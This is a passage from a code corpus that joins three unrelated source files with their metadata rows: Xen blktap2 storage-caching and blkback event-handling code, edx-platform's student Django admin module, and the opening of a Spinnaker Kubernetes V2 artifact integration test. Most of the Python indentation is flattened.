util.SMlog("Error creating parent cache: %s" % e)
self.alert_no_cache(session, vdi_uuid, local_sr_uuid, e.code)
return None
# local write node
leaf_size = vhdutil.getSizeVirt(self.target.vdi.path)
local_leaf_path = "%s/%s.vhdcache" % \
(local_sr.path, self.target.vdi.uuid)
if util.pathexists(local_leaf_path):
util.SMlog("Local leaf node (%s) already exists, deleting" % \
local_leaf_path)
os.unlink(local_leaf_path)
try:
vhdutil.snapshot(local_leaf_path, read_cache_path, False,
msize = leaf_size / 1024 / 1024, checkEmpty = False)
except util.CommandException, e:
util.SMlog("Error creating leaf cache: %s" % e)
self.alert_no_cache(session, vdi_uuid, local_sr_uuid, e.code)
return None
local_leaf_size = vhdutil.getSizeVirt(local_leaf_path)
if leaf_size > local_leaf_size:
util.SMlog("Leaf size %d > local leaf cache size %d, resizing" %
(leaf_size, local_leaf_size))
vhdutil.setSizeVirtFast(local_leaf_path, leaf_size)
vdi_type = self.target.get_vdi_type()
prt_tapdisk = Tapdisk.find_by_path(read_cache_path)
if not prt_tapdisk:
parent_options = copy.deepcopy(options)
parent_options["rdonly"] = False
parent_options["lcache"] = True
blktap = Blktap.allocate()
try:
blktap.set_pool_name("lcache-parent-pool-%s" % blktap.minor)
# no need to change pool_size since each parent tapdisk is in
# its own pool
prt_tapdisk = \
Tapdisk.launch_on_tap(blktap, read_cache_path,
'vhd', parent_options)
except:
blktap.free()
raise
secondary = "%s:%s" % (self.target.get_vdi_type(),
self.PhyLink.from_uuid(sr_uuid, vdi_uuid).readlink())
util.SMlog("Parent tapdisk: %s" % prt_tapdisk)
leaf_tapdisk = Tapdisk.find_by_path(local_leaf_path)
if not leaf_tapdisk:
blktap = Blktap.allocate()
child_options = copy.deepcopy(options)
child_options["rdonly"] = False
child_options["lcache"] = False
child_options["existing_prt"] = prt_tapdisk.minor
child_options["secondary"] = secondary
child_options["standby"] = scratch_mode
try:
leaf_tapdisk = \
Tapdisk.launch_on_tap(blktap, local_leaf_path,
'vhd', child_options)
except:
blktap.free()
raise
lock.release()
util.SMlog("Local read cache: %s, local leaf: %s" % \
(read_cache_path, local_leaf_path))
return leaf_tapdisk.get_devpath()
def remove_cache(self, sr_uuid, vdi_uuid, params):
if not self.target.has_cap("SR_CACHING"):
return
caching = params.get(self.CONF_KEY_ALLOW_CACHING) == "true"
local_sr_uuid = params.get(self.CONF_KEY_CACHE_SR)
if caching and not local_sr_uuid:
util.SMlog("ERROR: Local cache SR not specified, ignore")
return
if caching:
self._remove_cache(self._session, local_sr_uuid)
if self._session is not None:
self._updateCacheRecord(self._session, self.target.vdi.uuid, None, None)
def _is_tapdisk_in_use(self, minor):
(retVal, links) = util.findRunningProcessOrOpenFile("tapdisk")
if not retVal:
# err on the side of caution
return True
for link in links:
if link.find("tapdev%d" % minor) != -1:
return True
return False
def _remove_cache(self, session, local_sr_uuid):
import SR
import EXTSR
import NFSSR
import XenAPI
from lock import Lock
from FileSR import FileVDI
parent_uuid = vhdutil.getParent(self.target.vdi.path,
FileVDI.extractUuid)
if not parent_uuid:
util.SMlog("ERROR: No parent for VDI %s, ignore" % \
self.target.vdi.uuid)
return
util.SMlog("Tearing down the cache")
parent_uuid = parent_uuid.strip()
shared_target = NFSSR.NFSFileVDI(self.target.vdi.sr, parent_uuid)
SR.registerSR(EXTSR.EXTSR)
local_sr = SR.SR.from_uuid(session, local_sr_uuid)
lock = Lock(self.LOCK_CACHE_SETUP, parent_uuid)
lock.acquire()
# local write node
local_leaf_path = "%s/%s.vhdcache" % \
(local_sr.path, self.target.vdi.uuid)
if util.pathexists(local_leaf_path):
util.SMlog("Deleting local leaf node %s" % local_leaf_path)
os.unlink(local_leaf_path)
read_cache_path = "%s/%s.vhdcache" % (local_sr.path, shared_target.uuid)
prt_tapdisk = Tapdisk.find_by_path(read_cache_path)
if not prt_tapdisk:
util.SMlog("Parent tapdisk not found")
elif not self._is_tapdisk_in_use(prt_tapdisk.minor):
util.SMlog("Parent tapdisk not in use: shutting down %s" % \
read_cache_path)
try:
prt_tapdisk.shutdown()
except:
util.logException("shutting down parent tapdisk")
else:
util.SMlog("Parent tapdisk still in use: %s" % read_cache_path)
# the parent cache files are removed during the local SR's background
# GC run
lock.release()
PythonKeyError = KeyError
class UEventHandler(object):
def __init__(self):
self._action = None
class KeyError(PythonKeyError):
def __str__(self):
return \
"Key '%s' missing in environment. " % self.args[0] + \
"Not called in udev context?"
@classmethod
def getenv(cls, key):
try:
return os.environ[key]
except KeyError, e:
raise cls.KeyError(e.args[0])
def get_action(self):
if not self._action:
self._action = self.getenv('ACTION')
return self._action
class UnhandledEvent(Exception):
def __init__(self, event, handler):
self.event = event
self.handler = handler
def __str__(self):
return "Uevent '%s' not handled by %s" % \
(self.event, self.handler.__class__.__name__)
ACTIONS = {}
def run(self):
action = self.get_action()
try:
fn = self.ACTIONS[action]
except KeyError:
raise self.UnhandledEvent(action, self)
return fn(self)
def __str__(self):
try: action = self.get_action()
except: action = None
return "%s[%s]" % (self.__class__.__name__, action)
class __BlktapControl(ClassDevice):
SYSFS_CLASSTYPE = "misc"
def __init__(self):
ClassDevice.__init__(self)
self._default_pool = None
def sysfs_devname(self):
return "blktap!control"
class DefaultPool(Attribute):
SYSFS_NODENAME = "default_pool"
def get_default_pool_attr(self):
if not self._default_pool:
self._default_pool = self.DefaultPool.from_kobject(self)
return self._default_pool
def get_default_pool_name(self):
return self.get_default_pool_attr().readline()
def set_default_pool_name(self, name):
self.get_default_pool_attr().writeline(name)
def get_default_pool(self):
return BlktapControl.get_pool(self.get_default_pool_name())
def set_default_pool(self, pool):
self.set_default_pool_name(pool.name)
class NoSuchPool(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return "No such pool: %s", self.name
def get_pool(self, name):
path = "%s/pools/%s" % (self.sysfs_path(), name)
if not os.path.isdir(path):
raise self.NoSuchPool(name)
return PagePool(path)
BlktapControl = __BlktapControl()
class PagePool(KObject):
def __init__(self, path):
self.path = path
self._size = None
def sysfs_path(self):
return self.path
class Size(Attribute):
SYSFS_NODENAME = "size"
def get_size_attr(self):
if not self._size:
self._size = self.Size.from_kobject(self)
return self._size
def set_size(self, pages):
pages = str(pages)
self.get_size_attr().writeline(pages)
def get_size(self):
pages = self.get_size_attr().readline()
return int(pages)
class BusDevice(KObject):
SYSFS_BUSTYPE = None
@classmethod
def sysfs_bus_path(cls):
return "/sys/bus/%s" % cls.SYSFS_BUSTYPE
def sysfs_path(self):
path = "%s/devices/%s" % (self.sysfs_bus_path(),
self.sysfs_devname())
return path
class XenbusDevice(BusDevice):
"""Xenbus device, in XS and sysfs"""
XBT_NIL = ""
XENBUS_DEVTYPE = None
def __init__(self, domid, devid):
self.domid = int(domid)
self.devid = int(devid)
self._xbt = XenbusDevice.XBT_NIL
import xen.lowlevel.xs
self.xs = xen.lowlevel.xs.xs()
def xs_path(self, key=None):
path = "backend/%s/%d/%d" % (self.XENBUS_DEVTYPE,
self.domid,
self.devid)
if key is not None:
path = "%s/%s" % (path, key)
return path
def _log(self, prio, msg):
syslog(prio, msg)
def info(self, msg):
self._log(_syslog.LOG_INFO, msg)
def warn(self, msg):
self._log(_syslog.LOG_WARNING, "WARNING: " + msg)
def _xs_read_path(self, path):
val = self.xs.read(self._xbt, path)
#self.info("read %s = '%s'" % (path, val))
return val
def _xs_write_path(self, path, val):
        self.xs.write(self._xbt, path, val)
self.info("wrote %s = '%s'" % (path, val))
def _xs_rm_path(self, path):
self.xs.rm(self._xbt, path)
self.info("removed %s" % path)
def read(self, key):
return self._xs_read_path(self.xs_path(key))
def has_key(self, key):
return self.read(key) is not None
def write(self, key, val):
self._xs_write_path(self.xs_path(key), val)
def rm(self, key):
self._xs_rm_path(self.xs_path(key))
def exists(self):
return self.has_key(None)
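    # NB. begin()/commit()/abort() wrap a xenstore transaction; callers retry
    # the whole read/modify/write block when commit() returns False (see
    # BlkbackEventHandler.change() below for the retry loop).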
def begin(self):
assert(self._xbt == XenbusDevice.XBT_NIL)
self._xbt = self.xs.transaction_start()
def commit(self):
ok = self.xs.transaction_end(self._xbt, 0)
self._xbt = XenbusDevice.XBT_NIL
return ok
def abort(self):
ok = self.xs.transaction_end(self._xbt, 1)
assert(ok == True)
self._xbt = XenbusDevice.XBT_NIL
def create_physical_device(self):
"""The standard protocol is: toolstack writes 'params', linux hotplug
script translates this into physical-device=%x:%x"""
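        # Example (hypothetical device numbers): if 'params' is "/dev/xvdb"
        # and that node's st_rdev decodes to major 202, minor 16, the key
        # written back is physical-device = "ca:10".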
if self.has_key("physical-device"):
return
try:
params = self.read("params")
frontend = self.read("frontend")
            is_cdrom = self._xs_read_path("%s/device-type" % frontend) == "cdrom"
# We don't have PV drivers for CDROM devices, so we prevent blkback
# from opening the physical-device
if not(is_cdrom):
major_minor = os.stat(params).st_rdev
major, minor = divmod(major_minor, 256)
self.write("physical-device", "%x:%x" % (major, minor))
except:
util.logException("BLKTAP2:create_physical_device")
def signal_hotplug(self, online=True):
xapi_path = "/xapi/%d/hotplug/%s/%d/hotplug" % (self.domid,
self.XENBUS_DEVTYPE,
self.devid)
upstream_path = self.xs_path("hotplug-status")
if online:
self._xs_write_path(xapi_path, "online")
self._xs_write_path(upstream_path, "connected")
else:
self._xs_rm_path(xapi_path)
self._xs_rm_path(upstream_path)
def sysfs_devname(self):
return "%s-%d-%d" % (self.XENBUS_DEVTYPE,
self.domid, self.devid)
def __str__(self):
return self.sysfs_devname()
@classmethod
def find(cls):
pattern = "/sys/bus/%s/devices/%s*" % (cls.SYSFS_BUSTYPE,
cls.XENBUS_DEVTYPE)
for path in glob.glob(pattern):
name = os.path.basename(path)
(_type, domid, devid) = name.split('-')
yield cls(domid, devid)
class XenBackendDevice(XenbusDevice):
"""Xenbus backend device"""
SYSFS_BUSTYPE = "xen-backend"
@classmethod
def from_xs_path(cls, _path):
(_backend, _type, domid, devid) = _path.split('/')
assert _backend == 'backend'
assert _type == cls.XENBUS_DEVTYPE
domid = int(domid)
devid = int(devid)
return cls(domid, devid)
class Blkback(XenBackendDevice):
"""A blkback VBD"""
XENBUS_DEVTYPE = "vbd"
def __init__(self, domid, devid):
XenBackendDevice.__init__(self, domid, devid)
self._phy = None
self._vdi_uuid = None
self._q_state = None
self._q_events = None
class XenstoreValueError(Exception):
KEY = None
def __init__(self, vbd, _str):
self.vbd = vbd
self.str = _str
def __str__(self):
return "Backend %s " % self.vbd + \
"has %s = %s" % (self.KEY, self.str)
class PhysicalDeviceError(XenstoreValueError):
KEY = "physical-device"
class PhysicalDevice(object):
def __init__(self, major, minor):
self.major = int(major)
self.minor = int(minor)
@classmethod
def from_xbdev(cls, xbdev):
phy = xbdev.read("physical-device")
try:
major, minor = phy.split(':')
major = int(major, 0x10)
minor = int(minor, 0x10)
except Exception, e:
raise xbdev.PhysicalDeviceError(xbdev, phy)
return cls(major, minor)
def makedev(self):
return os.makedev(self.major, self.minor)
def is_tap(self):
return self.major == Tapdisk.major()
def __str__(self):
return "%s:%s" % (self.major, self.minor)
def __eq__(self, other):
return \
self.major == other.major and \
self.minor == other.minor
def get_physical_device(self):
if not self._phy:
self._phy = self.PhysicalDevice.from_xbdev(self)
return self._phy
class QueueEvents(Attribute):
"""Blkback sysfs node to select queue-state event
notifications emitted."""
SYSFS_NODENAME = "queue_events"
QUEUE_RUNNING = (1<<0)
QUEUE_PAUSE_DONE = (1<<1)
QUEUE_SHUTDOWN_DONE = (1<<2)
QUEUE_PAUSE_REQUEST = (1<<3)
QUEUE_SHUTDOWN_REQUEST = (1<<4)
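        # Example: set_mask(QUEUE_PAUSE_DONE | QUEUE_SHUTDOWN_DONE) writes the
        # string "0x6" to the sysfs node (see _manage_vbd() for actual usage).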
def get_mask(self):
return int(self.readline(), 0x10)
def set_mask(self, mask):
self.writeline("0x%x" % mask)
def get_queue_events(self):
if not self._q_events:
self._q_events = self.QueueEvents.from_kobject(self)
return self._q_events
def get_vdi_uuid(self):
if not self._vdi_uuid:
self._vdi_uuid = self.read("sm-data/vdi-uuid")
return self._vdi_uuid
def pause_requested(self):
return self.has_key("pause")
def shutdown_requested(self):
return self.has_key("shutdown-request")
def shutdown_done(self):
return self.has_key("shutdown-done")
def running(self):
return self.has_key('queue-0/kthread-pid')
@classmethod
def find_by_physical_device(cls, phy):
for dev in cls.find():
try:
_phy = dev.get_physical_device()
except cls.PhysicalDeviceError:
continue
if _phy == phy:
yield dev
@classmethod
def find_by_tap_minor(cls, minor):
phy = cls.PhysicalDevice(Tapdisk.major(), minor)
return cls.find_by_physical_device(phy)
@classmethod
def find_by_tap(cls, tapdisk):
return cls.find_by_tap_minor(tapdisk.minor)
def has_tap(self):
if not self.can_tap():
return False
phy = self.get_physical_device()
if phy:
return phy.is_tap()
return False
def is_bare_hvm(self):
"""File VDIs for bare HVM. These are directly accessible by Qemu."""
try:
self.get_physical_device()
except self.PhysicalDeviceError, e:
vdi_type = self.read("type")
self.info("HVM VDI: type=%s" % vdi_type)
if e.str is not None or vdi_type != 'file':
raise
return True
return False
def can_tap(self):
return not self.is_bare_hvm()
class BlkbackEventHandler(UEventHandler):
LOG_FACILITY = _syslog.LOG_DAEMON
def __init__(self, ident=None, action=None):
if not ident: ident = self.__class__.__name__
self.ident = ident
self._vbd = None
self._tapdisk = None
UEventHandler.__init__(self)
def run(self):
self.xs_path = self.getenv('XENBUS_PATH')
openlog(str(self), 0, self.LOG_FACILITY)
UEventHandler.run(self)
def __str__(self):
try: path = self.xs_path
except: path = None
try: action = self.get_action()
except: action = None
return "%s[%s](%s)" % (self.ident, action, path)
def _log(self, prio, msg):
syslog(prio, msg)
util.SMlog("%s: " % self + msg)
def info(self, msg):
self._log(_syslog.LOG_INFO, msg)
def warn(self, msg):
self._log(_syslog.LOG_WARNING, "WARNING: " + msg)
def error(self, msg):
self._log(_syslog.LOG_ERR, "ERROR: " + msg)
def get_vbd(self):
if not self._vbd:
self._vbd = Blkback.from_xs_path(self.xs_path)
return self._vbd
def get_tapdisk(self):
if not self._tapdisk:
minor = self.get_vbd().get_physical_device().minor
self._tapdisk = Tapdisk.from_minor(minor)
return self._tapdisk
#
# Events
#
def __add(self):
vbd = self.get_vbd()
# Manage blkback transitions
# self._manage_vbd()
vbd.create_physical_device()
vbd.signal_hotplug()
@retried(backoff=.5, limit=10)
def add(self):
try:
self.__add()
except Attribute.NoSuchAttribute, e:
#
# FIXME: KOBJ_ADD is racing backend.probe, which
# registers device attributes. So poll a little.
#
self.warn("%s, still trying." % e)
raise RetryLoop.TransientFailure(e)
def __change(self):
vbd = self.get_vbd()
# 1. Pause or resume tapdisk (if there is one)
if vbd.has_tap():
pass
#self._pause_update_tap()
# 2. Signal Xapi.VBD.pause/resume completion
self._signal_xapi()
def change(self):
vbd = self.get_vbd()
# NB. Beware of spurious change events between shutdown
# completion and device removal. Also, Xapi.VM.migrate will
# hammer a couple extra shutdown-requests into the source VBD.
while True:
vbd.begin()
if not vbd.exists() or \
vbd.shutdown_done():
break
self.__change()
if vbd.commit():
return
vbd.abort()
self.info("spurious uevent, ignored.")
def remove(self):
vbd = self.get_vbd()
vbd.signal_hotplug(False)
ACTIONS = { 'add': add,
'change': change,
'remove': remove }
#
# VDI.pause
#
def _tap_should_pause(self):
"""Enumerate all VBDs on our tapdisk. Returns true iff any was
paused"""
tapdisk = self.get_tapdisk()
TapState = Tapdisk.PauseState
PAUSED = 'P'
RUNNING = 'R'
PAUSED_SHUTDOWN = 'P,S'
# NB. Shutdown/paused is special. We know it's not going
# to restart again, so it's a RUNNING. Still better than
# backtracking a removed device during Vbd.unplug completion.
next = TapState.RUNNING
vbds = {}
for vbd in Blkback.find_by_tap(tapdisk):
name = str(vbd)
pausing = vbd.pause_requested()
closing = vbd.shutdown_requested()
running = vbd.running()
if pausing:
if closing and not running:
vbds[name] = PAUSED_SHUTDOWN
else:
vbds[name] = PAUSED
next = TapState.PAUSED
else:
vbds[name] = RUNNING
self.info("tapdev%d (%s): %s -> %s"
% (tapdisk.minor, tapdisk.pause_state(),
vbds, next))
return next == TapState.PAUSED
def _pause_update_tap(self):
vbd = self.get_vbd()
if self._tap_should_pause():
self._pause_tap()
else:
self._resume_tap()
def _pause_tap(self):
tapdisk = self.get_tapdisk()
if not tapdisk.is_paused():
self.info("pausing %s" % tapdisk)
tapdisk.pause()
def _resume_tap(self):
tapdisk = self.get_tapdisk()
# NB. Raw VDI snapshots. Refresh the physical path and
# type while resuming.
vbd = self.get_vbd()
vdi_uuid = vbd.get_vdi_uuid()
if tapdisk.is_paused():
self.info("loading vdi uuid=%s" % vdi_uuid)
vdi = VDI.from_cli(vdi_uuid)
_type = vdi.get_tap_type()
path = vdi.get_phy_path()
self.info("resuming %s on %s:%s" % (tapdisk, _type, path))
tapdisk.unpause(_type, path)
#
# VBD.pause/shutdown
#
def _manage_vbd(self):
vbd = self.get_vbd()
# NB. Hook into VBD state transitions.
events = vbd.get_queue_events()
mask = 0
mask |= events.QUEUE_PAUSE_DONE # pause/unpause
mask |= events.QUEUE_SHUTDOWN_DONE # shutdown
# TODO: mask |= events.QUEUE_SHUTDOWN_REQUEST, for shutdown=force
# TODO: mask |= events.QUEUE_RUNNING, for ionice updates etc
events.set_mask(mask)
self.info("wrote %s = %#02x" % (events.path, mask))
def _signal_xapi(self):
vbd = self.get_vbd()
pausing = vbd.pause_requested()
closing = vbd.shutdown_requested()
running = vbd.running()
handled = 0
if pausing and not running:
if not vbd.has_key('pause-done'):
vbd.write('pause-done', '')
handled += 1
if not pausing:
if vbd.has_key('pause-done'):
vbd.rm('pause-done')
handled += 1
if closing and not running:
if not vbd.has_key('shutdown-done'):
vbd.write('shutdown-done', '')
handled += 1
if handled > 1:
self.warn("handled %d events, " % handled +
"pausing=%s closing=%s running=%s" % \
(pausing, closing, running))
if __name__ == '__main__':
import sys
prog = os.path.basename(sys.argv[0])
#
# Simple CLI interface for manual operation
#
# tap.* level calls go down to local Tapdisk()s (by physical path)
# vdi.* level calls run the plugin calls across host boundaries.
#
def usage(stream):
print >>stream, \
"usage: %s tap.{list|major}" % prog
print >>stream, \
" %s tap.{launch|find|get|pause|" % prog + \
"unpause|shutdown|stats} {[<tt>:]<path>} | [minor=]<int> | .. }"
print >>stream, \
" %s vbd.uevent" % prog
try:
cmd = sys.argv[1]
except IndexError:
usage(sys.stderr)
sys.exit(1)
try:
_class, method = cmd.split('.')
except:
usage(sys.stderr)
sys.exit(1)
#
# Local Tapdisks
#
if cmd == 'tap.major':
print "%d" % Tapdisk.major()
elif cmd == 'tap.launch':
tapdisk = Tapdisk.launch_from_arg(sys.argv[2])
print >> sys.stderr, "Launched %s" % tapdisk
elif _class == 'tap':
attrs = {}
for item in sys.argv[2:]:
try:
key, val = item.split('=')
attrs[key] = val
continue
except ValueError:
pass
try:
attrs['minor'] = int(item)
continue
except ValueError:
pass
try:
arg = Tapdisk.Arg.parse(item)
attrs['_type'] = arg.type
attrs['path'] = arg.path
continue
except Tapdisk.Arg.InvalidArgument:
pass
attrs['path'] = item
if cmd == 'tap.list':
for tapdisk in Tapdisk.list(**attrs):
blktap = tapdisk.get_blktap()
print tapdisk,
print "%s: task=%s pool=%s" % \
(blktap,
blktap.get_task_pid(),
blktap.get_pool_name())
elif cmd == 'tap.vbds':
# Find all Blkback instances for a given tapdisk
for tapdisk in Tapdisk.list(**attrs):
print "%s:" % tapdisk,
for vbd in Blkback.find_by_tap(tapdisk):
print vbd,
print
else:
if not attrs:
usage(sys.stderr)
sys.exit(1)
try:
tapdisk = Tapdisk.get(**attrs)
except TypeError:
usage(sys.stderr)
sys.exit(1)
if cmd == 'tap.shutdown':
# Shutdown a running tapdisk, or raise
tapdisk.shutdown()
print >> sys.stderr, "Shut down %s" % tapdisk
elif cmd == 'tap.pause':
# Pause an unpaused tapdisk, or raise
tapdisk.pause()
print >> sys.stderr, "Paused %s" % tapdisk
elif cmd == 'tap.unpause':
# Unpause a paused tapdisk, or raise
tapdisk.unpause()
print >> sys.stderr, "Unpaused %s" % tapdisk
elif cmd == 'tap.stats':
# Gather tapdisk status
stats = tapdisk.stats()
print "%s:" % tapdisk
print json.dumps(stats, indent=True)
else:
usage(sys.stderr)
sys.exit(1)
elif cmd == 'vbd.uevent':
hnd = BlkbackEventHandler(cmd)
if not sys.stdin.isatty():
try:
hnd.run()
except Exception, e:
hnd.error("Unhandled Exception: %s" % e)
import traceback
_type, value, tb = sys.exc_info()
trace = traceback.format_exception(_type, value, tb)
for entry in trace:
for line in entry.rstrip().split('\n'):
util.SMlog(line)
else:
hnd.run()
elif cmd == 'vbd.list':
for vbd in Blkback.find():
print vbd, \
"physical-device=%s" % vbd.get_physical_device(), \
"pause=%s" % vbd.pause_requested()
else:
usage(sys.stderr)
sys.exit(1)
| lgpl-2.1 | -5,769,786,515,209,374,000 | 30.340035 | 129 | 0.533656 | false |
hastexo/edx-platform | common/djangoapps/student/admin.py | 1 | 7348 | """ Django admin pages for student app """
from config_models.admin import ConfigurationModelAdmin
from django import forms
from django.contrib import admin
from django.contrib.admin.sites import NotRegistered
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.utils.translation import ugettext_lazy as _
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from student.models import (
CourseAccessRole,
CourseEnrollment,
CourseEnrollmentAllowed,
DashboardConfiguration,
LinkedInAddToProfileConfiguration,
PendingNameChange,
Registration,
RegistrationCookieConfiguration,
UserAttribute,
UserProfile,
UserTestGroup
)
from student.roles import REGISTERED_ACCESS_ROLES
from xmodule.modulestore.django import modulestore
User = get_user_model() # pylint:disable=invalid-name
class CourseAccessRoleForm(forms.ModelForm):
"""Form for adding new Course Access Roles view the Django Admin Panel."""
class Meta(object):
model = CourseAccessRole
fields = '__all__'
email = forms.EmailField(required=True)
COURSE_ACCESS_ROLES = [(role_name, role_name) for role_name in REGISTERED_ACCESS_ROLES.keys()]
role = forms.ChoiceField(choices=COURSE_ACCESS_ROLES)
def clean_course_id(self):
"""
        Check the course-id format and that the course exists in the modulestore.
        This field can be null.
"""
if self.cleaned_data['course_id']:
course_id = self.cleaned_data['course_id']
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
raise forms.ValidationError(u"Invalid CourseID. Please check the format and re-try.")
if not modulestore().has_course(course_key):
raise forms.ValidationError(u"Cannot find course with id {} in the modulestore".format(course_id))
return course_key
return None
def clean_org(self):
"""If org and course-id exists then Check organization name
against the given course.
"""
if self.cleaned_data.get('course_id') and self.cleaned_data['org']:
org = self.cleaned_data['org']
org_name = self.cleaned_data.get('course_id').org
if org.lower() != org_name.lower():
raise forms.ValidationError(
u"Org name {} is not valid. Valid name is {}.".format(
org, org_name
)
)
return self.cleaned_data['org']
def clean_email(self):
"""
        Resolve the given email address to an existing User object.
"""
email = self.cleaned_data['email']
try:
user = User.objects.get(email=email)
except Exception:
raise forms.ValidationError(
u"Email does not exist. Could not find {email}. Please re-enter email address".format(
email=email
)
)
return user
def clean(self):
"""
        Check that an identical course access role record does not already exist in the DB.
"""
cleaned_data = super(CourseAccessRoleForm, self).clean()
if not self.errors:
if CourseAccessRole.objects.filter(
user=cleaned_data.get("email"),
org=cleaned_data.get("org"),
course_id=cleaned_data.get("course_id"),
role=cleaned_data.get("role")
).exists():
raise forms.ValidationError("Duplicate Record.")
return cleaned_data
def __init__(self, *args, **kwargs):
super(CourseAccessRoleForm, self).__init__(*args, **kwargs)
if self.instance.user_id:
self.fields['email'].initial = self.instance.user.email
@admin.register(CourseAccessRole)
class CourseAccessRoleAdmin(admin.ModelAdmin):
"""Admin panel for the Course Access Role. """
form = CourseAccessRoleForm
raw_id_fields = ("user",)
exclude = ("user",)
fieldsets = (
(None, {
'fields': ('email', 'course_id', 'org', 'role',)
}),
)
list_display = (
'id', 'user', 'org', 'course_id', 'role',
)
search_fields = (
'id', 'user__username', 'user__email', 'org', 'course_id', 'role',
)
def save_model(self, request, obj, form, change):
obj.user = form.cleaned_data['email']
super(CourseAccessRoleAdmin, self).save_model(request, obj, form, change)
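    # Note: the form exposes an 'email' field in place of the raw 'user' FK;
    # clean_email() resolves it to a User instance, which save_model() above
    # assigns to obj.user before saving.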
@admin.register(LinkedInAddToProfileConfiguration)
class LinkedInAddToProfileConfigurationAdmin(admin.ModelAdmin):
"""Admin interface for the LinkedIn Add to Profile configuration. """
class Meta(object):
model = LinkedInAddToProfileConfiguration
# Exclude deprecated fields
exclude = ('dashboard_tracking_code',)
@admin.register(CourseEnrollment)
class CourseEnrollmentAdmin(admin.ModelAdmin):
""" Admin interface for the CourseEnrollment model. """
list_display = ('id', 'course_id', 'mode', 'user', 'is_active',)
list_filter = ('mode', 'is_active',)
raw_id_fields = ('user',)
search_fields = ('course__id', 'mode', 'user__username',)
def queryset(self, request):
return super(CourseEnrollmentAdmin, self).queryset(request).select_related('user')
class Meta(object):
model = CourseEnrollment
class UserProfileInline(admin.StackedInline):
""" Inline admin interface for UserProfile model. """
model = UserProfile
can_delete = False
verbose_name_plural = _('User profile')
class UserAdmin(BaseUserAdmin):
""" Admin interface for the User model. """
inlines = (UserProfileInline,)
def get_readonly_fields(self, *args, **kwargs):
"""
        Allows editing the users while skipping the username check, so we can have Unicode usernames with no problems.
The username is marked read-only regardless of `ENABLE_UNICODE_USERNAME`, to simplify the bokchoy tests.
"""
django_readonly = super(UserAdmin, self).get_readonly_fields(*args, **kwargs)
return django_readonly + ('username',)
@admin.register(UserAttribute)
class UserAttributeAdmin(admin.ModelAdmin):
""" Admin interface for the UserAttribute model. """
list_display = ('user', 'name', 'value',)
list_filter = ('name',)
raw_id_fields = ('user',)
search_fields = ('name', 'value', 'user__username',)
class Meta(object):
model = UserAttribute
@admin.register(CourseEnrollmentAllowed)
class CourseEnrollmentAllowedAdmin(admin.ModelAdmin):
""" Admin interface for the CourseEnrollmentAllowed model. """
list_display = ('email', 'course_id', 'auto_enroll',)
search_fields = ('email', 'course_id',)
class Meta(object):
model = CourseEnrollmentAllowed
admin.site.register(UserTestGroup)
admin.site.register(Registration)
admin.site.register(PendingNameChange)
admin.site.register(DashboardConfiguration, ConfigurationModelAdmin)
admin.site.register(RegistrationCookieConfiguration, ConfigurationModelAdmin)
# We must first un-register the User model since it may also be registered by the auth app.
try:
admin.site.unregister(User)
except NotRegistered:
pass
admin.site.register(User, UserAdmin)
| agpl-3.0 | 6,108,567,337,956,617,000 | 31.950673 | 117 | 0.64657 | false |
skim1420/spinnaker | testing/citest/tests/kube_v2_artifact_test.py | 1 | 17011 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Integration test to see if artifact handling (docker image and configmap
substitution and versioning) is working for the Spinnaker Kubernetes V2 integration.
"""
# Standard python modules.
import sys
import random
import string
# citest modules.
import citest.kube_testing as kube
import citest.json_contract as jc
import citest.json_predicate as jp
import citest.service_testing as st
# Spinnaker modules.
import spinnaker_testing as sk
import spinnaker_testing.gate as gate
import spinnaker_testing.frigga as frigga
import citest.base
ov_factory = jc.ObservationPredicateFactory()
class KubeV2ArtifactTestScenario(sk.SpinnakerTestScenario):
"""Defines the scenario for the kube v2 artifact test.
"""
@classmethod
def new_agent(cls, bindings):
"""Implements citest.service_testing.AgentTestScenario.new_agent."""
agent = gate.new_agent(bindings)
agent.default_max_wait_secs = 180
return agent
@classmethod
def initArgumentParser(cls, parser, defaults=None):
"""Initialize command line argument parser.
Args:
parser: argparse.ArgumentParser
"""
super(KubeV2ArtifactTestScenario, cls).initArgumentParser(
parser, defaults=defaults)
defaults = defaults or {}
parser.add_argument(
'--test_namespace', default='default',
help='The namespace to manage within the tests.')
def __init__(self, bindings, agent=None):
"""Constructor.
Args:
bindings: [dict] The data bindings to use to configure the scenario.
agent: [GateAgent] The agent for invoking the test operations on Gate.
"""
super(KubeV2ArtifactTestScenario, self).__init__(bindings, agent)
bindings = self.bindings
# We'll call out the app name because it is widely used
# because it scopes the context of our activities.
# pylint: disable=invalid-name
self.TEST_APP = bindings['TEST_APP']
# Take just the first if there are multiple
# because some uses below assume just one.
self.TEST_NAMESPACE = bindings['TEST_NAMESPACE'].split(',')[0]
self.mf = sk.KubernetesManifestFactory(self)
self.mp = sk.KubernetesManifestPredicateFactory()
self.ps = sk.PipelineSupport(self)
def create_app(self):
"""Creates OperationContract that creates a new Spinnaker Application."""
contract = jc.Contract()
return st.OperationContract(
self.agent.make_create_app_operation(
bindings=self.bindings, application=self.TEST_APP,
account_name=self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT']),
contract=contract)
def delete_app(self):
"""Creates OperationContract that deletes a new Spinnaker Application."""
contract = jc.Contract()
return st.OperationContract(
self.agent.make_delete_app_operation(
application=self.TEST_APP,
account_name=self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT']),
contract=contract)
def __docker_image_artifact(self, name, image):
id_ = ''.join(random.choice(string.ascii_uppercase + string.digits)
for _ in range(10))
return {
'type': 'docker/image',
'name': name,
'reference': image,
'uuid': id_
}
def deploy_unversioned_config_map(self, value):
"""Creates OperationContract for deploying an unversioned configmap
To verify the operation, we just check that the configmap was created with
the correct 'value'.
"""
name = self.TEST_APP + '-configmap'
manifest = self.mf.config_map(name, {'value': value})
manifest['metadata']['annotations'] = {'strategy.spinnaker.io/versioned': 'false'}
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'moniker': {
